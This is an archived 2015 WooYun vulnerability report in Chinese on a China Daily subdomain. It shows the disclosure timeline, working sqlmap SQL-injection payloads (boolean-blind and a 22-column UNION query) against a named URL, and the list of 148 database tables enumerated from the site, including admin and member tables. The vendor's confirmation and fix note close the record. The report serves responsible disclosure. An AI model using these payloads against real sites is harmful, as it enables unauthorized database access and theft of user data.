乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-05: 细节已通知厂商并且等待厂商处理中 2015-05-08: 厂商已经确认,细节仅向厂商公开 2015-05-18: 细节向核心白帽子及相关领域专家公开 2015-05-28: 细节向普通白帽子公开 2015-06-07: 细节向实习白帽子公开 2015-06-09: 厂商已经修复漏洞并主动公开,细节向公众公开
http://ichuguoimage.chinadaily.com.cn/video/detail/vid/8284724
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://ichuguoimage.chinadaily.com.cn:80/video/detail/vid/8284724' AND 3971=3971 AND 'EDWL'='EDWL Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: http://ichuguoimage.chinadaily.com.cn:80/video/detail/vid/-2788' UNION ALL SELECT NULL,CONCAT(0x716e787771,0x6e4e4f7971755059736c,0x71746f7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: Apacheback-end DBMS: MySQL 5Database: ichuguo[148 tables]+------------------------------+| _integral_rule || _integral_rule_log || _jobs || _message_main || _message_type || _system_setting || _users_action || _users_album || _users_album_pic || _users_category || _users_cover || _users_department || _users_department_relation || _users_education_experience || _users_expert || _users_expert_apply || _users_expert_key || _users_follow || _users_group || _users_info || _users_info_app_ext || _users_info_app_list || _users_open || _users_pm || _users_poi || _users_programme || _users_qq || _users_sina || _users_tag || _users_type || _users_visit_log || _users_work_experience || _wenda_admin_controller || _wenda_arc || _wenda_blog || _wenda_brand || _wenda_brand_cate || _wenda_cache_site || _wenda_category || _wenda_city_discover || _wenda_comment || _wenda_discover || _wenda_feed || _wenda_info || _wenda_isread || _wenda_isread_rule || _wenda_knowledge || _wenda_log || _wenda_navigation || _wenda_notice || _wenda_notice_log || _wenda_permission_config || _wenda_recomend || _wenda_reply || _wenda_rtx_users || _wenda_site_info || _wenda_sns_reply || _wenda_so || _wenda_sysblog || _wenda_sysetm || _wenda_tag || _wenda_tag_category || _wenda_topic || _wenda_topic_category || _wenda_type || _wenda_video || _wenda_video_cate || _wenda_video_copy_1125 || _wenda_view || _wenda_vote || _wenda_vote_option || _wenda_voter || acl_admin_group || acl_info || admingroup || adminuser || adv_city || adv_hot_top10 || adv_news || area_attr || area_category || article || article_category || article_category_related || article_edit_logs || article_recommend || bak_article_category_related || bak_new_recommend || bak_new_recommend2 || bak_new_recommend3 || concern || converge || country || fast_source || gallery || gallery_image || member_changepassword || new_recommend || new_recommend_position || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_badwords || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pm_indexes || pre_ucenter_pm_lists || pre_ucenter_pm_members || pre_ucenter_pm_messages_0 || pre_ucenter_pm_messages_1 || pre_ucenter_pm_messages_2 || pre_ucenter_pm_messages_3 || pre_ucenter_pm_messages_4 || pre_ucenter_pm_messages_5 || pre_ucenter_pm_messages_6 || pre_ucenter_pm_messages_7 || pre_ucenter_pm_messages_8 || pre_ucenter_pm_messages_9 || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars || recommend || site_info || spec_block_item || special || special_category || special_category_copy || special_category_related || special_operate_logs || special_recommend || special_template || special_weekly || subject || subject_item || subscribe_email || subscribe_email_bak || user_info || user_source_related || vane |+------------------------------+
危害等级:中
漏洞Rank:10
确认时间:2015-05-08 10:51
十分感谢,联系同事修复。
2015-06-09:十分感谢,已经修复了